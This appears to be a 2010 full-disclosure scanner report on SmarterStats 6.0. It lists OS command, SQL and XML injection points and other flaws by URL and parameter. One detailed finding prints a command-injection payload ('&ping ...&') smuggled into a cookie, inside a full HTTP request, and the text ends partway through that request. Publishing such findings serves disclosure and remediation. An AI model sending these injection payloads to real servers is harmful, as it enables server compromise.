Default Installation, SmarterStats 6.0, XML Injection, OS Command Execution, Smarter Stats Web Server, Report of October 2010


StarterStats 6.2 Report updated on May 20, 2011 with Stored and Reflected XSS.
This Report generated by XSS.CX Research Blog on Windows 2008 R2 Server, 64 Bit at Tue Oct 12 15:20:59 CDT 2010. with respect to SmarterStats 6.0 with SmarterTools Web Server (bundled in download).

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

1. OS command injection

1.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [STTTState cookie]

1.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtAdminNewPassword_SettingText parameter]

1.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtSmarterLogDirectory parameter]

1.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter]

1.5. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter]

1.6. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00_MPH_grdLogLocations_HiddenLSR parameter]

2. SQL injection

2.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtSmarterLogDirectory parameter]

2.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText parameter]

2.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter]

2.4. http://vulnerable.smarterstats.6.0.host:9999/Default.aspx [ctl00%24PageTitle parameter]

2.5. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

2.6. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

2.7. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

2.8. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [Referer HTTP header]

2.9. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

2.10. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

2.11. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

2.12. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

2.13. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

2.14. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

2.15. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

2.16. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [User-Agent HTTP header]

2.17. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [loginsettings cookie]

2.18. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

2.19. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

2.20. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

2.21. http://vulnerable.smarterstats.6.0.host:9999/login.aspx [Referer HTTP header]

2.22. http://vulnerable.smarterstats.6.0.host:9999/login.aspx [STHashCookie cookie]

2.23. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [ReportType parameter]


SmarterStats 6.0, CWE-31, CWE-89, CAPEC-66, CAPEC-213, CAPEC-88 SmarterStats 6.0, CWE-31, CWE-89, CAPEC-66, CAPEC-213, CAPEC-88 SmarterStats 6.0, CWE-31, CWE-89, CAPEC-66, CAPEC-213, CAPEC-88 SmarterStats 6.0, CWE-31, CWE-89, CAPEC-66, CAPEC-213, CAPEC-88

Hoyt LLC Research | Full Disclosure | As of March 14, 2011

Plesk SMB 10.2.0 Windows - Site Editor | Full Disclosure
Plesk Small Business Manager 10.2.0 for Windows | Full Disclosure
Hoyt LLC Research | Full Disclosure Report on Stored XSS in SmarterMail 8.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterStats 6.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterMail 7.x Series

3. XML injection

3.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [STHashCookie cookie]

3.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [STTTState cookie]

3.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [SelectedLanguage cookie]

3.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [loginsettings cookie]

3.5. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [STHashCookie cookie]

3.6. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [STTTState cookie]

3.7. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [SelectedLanguage cookie]

3.8. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [loginsettings cookie]

3.9. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [reportID parameter]

3.10. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [STHashCookie cookie]

3.11. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [STTTState cookie]

3.12. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [SelectedLanguage cookie]

3.13. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [loginsettings cookie]

3.14. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [subReportName parameter]

3.15. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

3.16. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

3.17. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

3.18. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [loginsettings cookie]

3.19. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

3.20. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

4. Cleartext submission of password

4.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmEmailReportSettings.aspx

4.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmGeneralSettings.aspx

4.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx

4.4. http://vulnerable.smarterstats.6.0.host:9999/Client/frmUser.aspx

4.5. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx

5. Cross-domain Referer leakage

5.1. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx

5.2. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx

5.3. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

5.4. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

5.5. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

5.6. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

6. Cookie without HttpOnly flag set

7. Password field with autocomplete enabled

7.1. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx

7.2. http://vulnerable.smarterstats.6.0.host:9999/login.aspx

8. Directory listing

8.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/

8.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/

8.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/GettingStarted/

8.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/Popups/

8.5. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/

8.6. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/

8.7. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/

8.8. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/BrowserOverrides/

8.9. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Error/

8.10. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/FileDownload/

8.11. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/GettingStarted/

8.12. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Internal/

8.13. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Login/

8.14. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Mail/

8.15. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Main/

8.16. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Popup/

8.17. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Portal/

8.18. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Print/

8.19. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Reporting/

8.20. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Stats/

8.21. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Track/

8.22. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Wizard/

8.23. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/

8.24. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Calendar/

8.25. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Calendar/Img/

8.26. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Combobox/

8.27. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Common/

8.28. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Editor/

8.29. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Editor/Img/

8.30. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Grid/

8.31. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Input/

8.32. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Spell/

8.33. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Spell/Img/

8.34. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/TabStrip/

8.35. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/TabStrip/Img/

8.36. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Toolbar/

8.37. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Toolbar/Img/

8.38. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/

8.39. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/CssImg/

8.40. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/Img/

8.41. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Flash/

8.42. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Images/16x16/

8.43. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Images/Pager/

8.44. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Javascript/

8.45. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Sounds/

8.46. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/

8.47. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Customer/

8.48. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Customer/Pager/

8.49. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Invitations/

8.50. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Invitations/Button/

8.51. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Plupload/

8.52. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/

8.53. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/DragDrop/

8.54. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/IconMenuInternal/

8.55. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/IconMenuTrack/

8.56. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/MessageView/

8.57. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/MessageView/rollover/

8.58. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/iconmenu/

8.59. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/iconmenustats/

8.60. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/misc/

8.61. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/misc/tree/

8.62. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/skin/

8.63. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/social_icons/

8.64. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/stats/

8.65. http://vulnerable.smarterstats.6.0.host:9999/Client/

8.66. http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/

8.67. http://vulnerable.smarterstats.6.0.host:9999/Services/

8.68. http://vulnerable.smarterstats.6.0.host:9999/Temp/

8.69. http://vulnerable.smarterstats.6.0.host:9999/UserControls/

8.70. http://vulnerable.smarterstats.6.0.host:9999/UserControls/PanelBarTemplates/

8.71. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/

8.72. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/

8.73. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/system_web/

9. Email addresses disclosed

9.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmEmailReportSettings.aspx

9.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmGeneralSettings.aspx

10. Content type incorrectly stated

10.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx

10.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx

10.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmViewReports.aspx

10.4. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/AboutThisFolder.txt

10.5. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx

10.6. http://vulnerable.smarterstats.6.0.host:9999/Temp/0c2c2823b31f46149208732c08a4fee8.jpg

10.7. http://vulnerable.smarterstats.6.0.host:9999/Temp/1039b7037bea4372821b6b290d0745da.jpg

10.8. http://vulnerable.smarterstats.6.0.host:9999/Temp/1d4802d431604203a5254435a7181b01.jpg

10.9. http://vulnerable.smarterstats.6.0.host:9999/Temp/1f19d55ce9bf405b93deb28b84494a1f.jpg

10.10. http://vulnerable.smarterstats.6.0.host:9999/Temp/20226bc24c8e4c89926647164054826e.jpg

10.11. http://vulnerable.smarterstats.6.0.host:9999/Temp/26da1ed6256b4e7f89617f968309aea9.jpg

10.12. http://vulnerable.smarterstats.6.0.host:9999/Temp/272276131291426282a9ebb0efad2752.jpg

10.13. http://vulnerable.smarterstats.6.0.host:9999/Temp/29bf53d9459f4ad5897ed8fe1e6273c6.jpg

10.14. http://vulnerable.smarterstats.6.0.host:9999/Temp/3022c349e42e4a16915d331a96969eb5.jpg

10.15. http://vulnerable.smarterstats.6.0.host:9999/Temp/3568cde247644a1b9ec6e79fbea220fc.jpg

10.16. http://vulnerable.smarterstats.6.0.host:9999/Temp/356d07443f3445d88a06bf724a953c85.jpg

10.17. http://vulnerable.smarterstats.6.0.host:9999/Temp/3a06471f3515434aa5438ccdb1d520e8.jpg

10.18. http://vulnerable.smarterstats.6.0.host:9999/Temp/3a8d8b9425a049fd9040fcd161eeba53.jpg

10.19. http://vulnerable.smarterstats.6.0.host:9999/Temp/47b58eea1f494809bf127e28495c2dd7.jpg

10.20. http://vulnerable.smarterstats.6.0.host:9999/Temp/48e37748c1fa4d0ca56699e5b80f0064.jpg

10.21. http://vulnerable.smarterstats.6.0.host:9999/Temp/53bea176ee1943dd981fd05e032eff33.jpg

10.22. http://vulnerable.smarterstats.6.0.host:9999/Temp/56dd80bb97d8414fbcfd594ed4282909.jpg

10.23. http://vulnerable.smarterstats.6.0.host:9999/Temp/590bf795fdaf4e02b7d0880f79b70e34.jpg

10.24. http://vulnerable.smarterstats.6.0.host:9999/Temp/5bf056fa42644067bd0099f9d59829e2.jpg

10.25. http://vulnerable.smarterstats.6.0.host:9999/Temp/60cde64eb7754b5d8ef26765f12a08ff.jpg

10.26. http://vulnerable.smarterstats.6.0.host:9999/Temp/610228c0ba7b4ab6803b2930991bc819.jpg

10.27. http://vulnerable.smarterstats.6.0.host:9999/Temp/67876ddccbec458db2d3c9fec41f1ab5.jpg

10.28. http://vulnerable.smarterstats.6.0.host:9999/Temp/788d1b2c29ad41fc956d04ff9b1e6a07.jpg

10.29. http://vulnerable.smarterstats.6.0.host:9999/Temp/78969dd70ff94762832f8dc8e7f76105.jpg

10.30. http://vulnerable.smarterstats.6.0.host:9999/Temp/7b3c6e936ca34e63ab51c459ff492d1e.jpg

10.31. http://vulnerable.smarterstats.6.0.host:9999/Temp/8494271a59234d898cdd787b473092ed.jpg

10.32. http://vulnerable.smarterstats.6.0.host:9999/Temp/869b700a3e8b4973a5fdd0981173fbce.jpg

10.33. http://vulnerable.smarterstats.6.0.host:9999/Temp/87c52fec79874f5a9f7278d96f4dc7f9.jpg

10.34. http://vulnerable.smarterstats.6.0.host:9999/Temp/91331a080c0148b0bddd5d75991acb5b.jpg

10.35. http://vulnerable.smarterstats.6.0.host:9999/Temp/9b829667b5214dbb92b4f41517bde32f.jpg

10.36. http://vulnerable.smarterstats.6.0.host:9999/Temp/9e3c5a71a82b4267ac3057765f388ecb.jpg

10.37. http://vulnerable.smarterstats.6.0.host:9999/Temp/AboutThisFolder.txt

10.38. http://vulnerable.smarterstats.6.0.host:9999/Temp/a1b92ef93b1b4be78245313c2d051569.jpg

10.39. http://vulnerable.smarterstats.6.0.host:9999/Temp/a61092b27bce47aa8accac88254b740c.jpg

10.40. http://vulnerable.smarterstats.6.0.host:9999/Temp/a796b3465add49de8e0c091a308040ff.jpg

10.41. http://vulnerable.smarterstats.6.0.host:9999/Temp/aa9f9504e4da409ebc871fa02f1cfc5d.jpg

10.42. http://vulnerable.smarterstats.6.0.host:9999/Temp/aae65ef47a3d4937bffc2e1dbe58c809.jpg

10.43. http://vulnerable.smarterstats.6.0.host:9999/Temp/ab51ac96f4bc4739bd3a746f1b589cd7.jpg

10.44. http://vulnerable.smarterstats.6.0.host:9999/Temp/afa9a3022c3e456690253161fd12125c.jpg

10.45. http://vulnerable.smarterstats.6.0.host:9999/Temp/b2972344c54b45e38070638051bc9478.jpg

10.46. http://vulnerable.smarterstats.6.0.host:9999/Temp/b7378ea2600d4d34ad1d031c4003a06c.jpg

10.47. http://vulnerable.smarterstats.6.0.host:9999/Temp/b970dd6404e94f54894db427147a64da.jpg

10.48. http://vulnerable.smarterstats.6.0.host:9999/Temp/b994a8c169af455497c7747bd9914800.jpg

10.49. http://vulnerable.smarterstats.6.0.host:9999/Temp/c77c8b574b60474b8ac78495f6f074dc.jpg

10.50. http://vulnerable.smarterstats.6.0.host:9999/Temp/cc02654a98df41d6bd5a3edd66c42234.jpg

10.51. http://vulnerable.smarterstats.6.0.host:9999/Temp/d31a05bc3d6e479fa7f64287243f64e6.jpg

10.52. http://vulnerable.smarterstats.6.0.host:9999/Temp/dd92df2132484a6aa26dbcaa91ff4156.jpg

10.53. http://vulnerable.smarterstats.6.0.host:9999/Temp/e13bc484ceca45bb97f15bfcc30a6c03.jpg

10.54. http://vulnerable.smarterstats.6.0.host:9999/Temp/e7d9eb9eadc04c58b59155ff298566e3.jpg

10.55. http://vulnerable.smarterstats.6.0.host:9999/Temp/e7ea3804b059410d9c7faf6f178d6ae9.jpg

10.56. http://vulnerable.smarterstats.6.0.host:9999/Temp/f0463b7c1a16472f90db2c0647d531bf.jpg

10.57. http://vulnerable.smarterstats.6.0.host:9999/Temp/f0b1d954de574491a98b97217656a58a.jpg

10.58. http://vulnerable.smarterstats.6.0.host:9999/Temp/f11eb6ccf75a496c84ce62908bd4560d.jpg

10.59. http://vulnerable.smarterstats.6.0.host:9999/Temp/f8ef6da096584c109a8620d83d0d2462.jpg

10.60. http://vulnerable.smarterstats.6.0.host:9999/default.aspx

10.61. http://vulnerable.smarterstats.6.0.host:9999/login.aspx

11. Content type is not specified

11.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmDefaultSiteSettings.aspx

11.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmServerDefaults.aspx

11.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmReportSettings.aspx

11.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx

11.5. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/ButtonBarIcons.xml

11.6. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Skin.xml

11.7. http://vulnerable.smarterstats.6.0.host:9999/Client/frmImportSettings.aspx

11.8. http://vulnerable.smarterstats.6.0.host:9999/Client/frmSeoSettings.aspx

11.9. http://vulnerable.smarterstats.6.0.host:9999/Services/Web.config

11.10. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/system_web/4_0_30319/

11.11. http://vulnerable.smarterstats.6.0.host:9999/clientaccesspolicy.xml

11.12. http://vulnerable.smarterstats.6.0.host:9999/cloudscan.exe

11.13. http://vulnerable.smarterstats.6.0.host:9999/crossdomain.xml

11.14. http://vulnerable.smarterstats.6.0.host:9999/sitemap.xml



1. OS command injection  next
There are 6 instances of this issue:

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:



1.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [STTTState cookie]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The STTTState cookie appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the STTTState cookie. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=%26ping%20-n%2020%20127.0.0.1%26
Content-Length: 30100

ctl00%24ScriptManager1=ctl00%24MPH%24UpdatePanel5%7Cctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTTARGET=ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAICD2QWAgIBDxYCHgdWaXNpYmxlaGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ8WAh8CaBYCAgEPFgIeBFRleHRlZAIID2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgQPFgIfAmhkAgkPZBYEAgEPZBYCAgMPFgIfBAUHTWVzc2FnZWQCAw9kFgJmD2QWAgIHD2QWCAICD2QWBgIBD2QWDmYPZBYCAgEPZBYCAgIPDxYCHwQFCGhveXQubmV0ZGQCAg8PFgIeCl9fcmVhZE9ubHlnZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIDD2QWAgIBD2QWBGYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCAg8PFgIfBAUJbG9jYWxob3N0ZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FZ2QWAgIBD2QWBGYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50aWFnbxgoR01ULTAzOjMwKSBOZXdmb3VuZGxhbmQkKEdNVC0wMzowMCkgQnVlbm9zIEFpcmVzLCBHZW9yZ2V0b3duFShHTVQtMDM6MDApIEdyZWVubGFuZBQoR01ULTAzOjAwKSBCcmFzaWxpYRYoR01ULTAzOjAwKSBNb250ZXZpZGVvGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYxIoR01ULTAxOjAwKSBBem9yZXMaKEdNVC0wMTowMCkgQ2FwZSBWZXJkZSBJcy4lKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpaz0oR01UKSBHcmVlbndpY2ggTWVhbiBUaW1lIDogRHVibGluLCBFZGluYnVyZ2gsIExpc2JvbiwgTG9uZG9uPShHTVQrMDE6MDApIEJlbGdyYWRlLCBCcmF0aXNsYXZhLCBCdWRhcGVzdCwgTGp1YmxqYW5hLCBQcmFndWUsKEdNVCswMTowMCkgU2FyYWpldm8sIFNrb3BqZSwgV2Fyc2F3LCBaYWdyZWIvKEdNVCswMTowMCkgQnJ1c3NlbHMsIENvcGVuaGFnZW4sIE1hZHJpZCwgUGFyaXM8KEdNVCswMTowMCkgQW1zdGVyZGFtLCBCZXJsaW4sIEJlcm4sIFJvbWUsIFN0b2NraG9sbSwgVmllbm5hHyhHTVQrMDE6MDApIFdl